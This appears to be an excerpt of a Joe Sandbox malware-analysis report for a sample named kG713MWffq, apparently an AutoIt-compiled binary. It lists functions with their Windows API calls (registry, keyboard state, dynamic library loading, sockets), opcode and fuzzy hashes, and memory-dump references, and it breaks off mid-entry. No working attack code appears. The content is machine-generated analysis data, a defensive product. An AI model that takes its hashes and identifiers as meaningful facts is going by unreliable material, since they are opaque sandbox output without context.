                                                                                        • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                                        APIs
                                                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                        • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                                        • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                                        • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                                        • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                                        • CloseFigure.GDI32(?), ref: 0044751F
                                                                                        • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                                        • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                        • String ID:
                                                                                        • API String ID: 4082120231-0
                                                                                        • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                        • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                                        • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                        • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                                        APIs
                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                                        • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 2027346449-0
                                                                                        • Opcode ID: e34509464942c339a97cd4dbca514092f8d2b70c3cdfc94ef9c95b79185a061f
                                                                                        • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                                        • Opcode Fuzzy Hash: e34509464942c339a97cd4dbca514092f8d2b70c3cdfc94ef9c95b79185a061f
                                                                                        • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                                        APIs
                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                        • GetMenu.USER32 ref: 0047A703
                                                                                        • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                                        • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                                        • _wcslen.LIBCMT ref: 0047A79E
                                                                                        • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                                        • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 3257027151-0
                                                                                        • Opcode ID: 4cce8c15dc1de934e3ee188264f8b3afc076397940d8cd24141180af461316c6
                                                                                        • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                                        • Opcode Fuzzy Hash: 4cce8c15dc1de934e3ee188264f8b3afc076397940d8cd24141180af461316c6
                                                                                        • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                                        APIs
                                                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastselect
                                                                                        • String ID:
                                                                                        • API String ID: 215497628-0
                                                                                        • Opcode ID: 56723facf433c3c8ff31edc338edb1e9341c45390fc1ded105fb915aba0924ee
                                                                                        • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                                        • Opcode Fuzzy Hash: 56723facf433c3c8ff31edc338edb1e9341c45390fc1ded105fb915aba0924ee
                                                                                        • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                                        APIs
                                                                                        • GetParent.USER32(?), ref: 0044443B
                                                                                        • GetKeyboardState.USER32(?), ref: 00444450
                                                                                        • SetKeyboardState.USER32(?), ref: 004444A4
                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                        • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                                        • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                        • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                                        APIs
                                                                                        • GetParent.USER32(?), ref: 00444633
                                                                                        • GetKeyboardState.USER32(?), ref: 00444648
                                                                                        • SetKeyboardState.USER32(?), ref: 0044469C
                                                                                        • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                                        • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                                        • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                                        • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                        • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                                        • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                        • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __snwprintf__wcsicoll_wcscpy
                                                                                        • String ID: , $$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                                        • API String ID: 1729044348-3025626884
                                                                                        • Opcode ID: f12e2ec193ec51211d53e6d1dcf57e68e7542ab99771527753ab8ffd6613dbe6
                                                                                        • Instruction ID: fa375d034fa7217e9d4d929611683fd4ef9c76ca58110cba6d833e9902d6ecd0
                                                                                        • Opcode Fuzzy Hash: f12e2ec193ec51211d53e6d1dcf57e68e7542ab99771527753ab8ffd6613dbe6
                                                                                        • Instruction Fuzzy Hash: 5D5184719002099BCB10EF51C982AEFB779EF84308F10856BF905B7281D779AE45CBE9
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                                        • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                                        • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2354583917-0
                                                                                        • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                        • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                                        • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                        • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                                        APIs
                                                                                        • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                                        • String ID: Wu
                                                                                        • API String ID: 2449869053-4083010176
                                                                                        • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                        • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                                        • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                        • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                        • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                                        • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                        • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                                        APIs
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Enable$Show$MessageMoveSend
                                                                                        • String ID:
                                                                                        • API String ID: 896007046-0
                                                                                        • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                        • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                                        • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                        • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                                        • GetFocus.USER32 ref: 00448ACF
                                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Enable$Show$FocusMessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3429747543-0
                                                                                        • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                        • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                                        • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                        • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                        • __swprintf.LIBCMT ref: 0045D4E9
                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                        • String ID: %lu$\VH
                                                                                        • API String ID: 3164766367-2432546070
                                                                                        • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                        • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                        • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                        • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                        • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
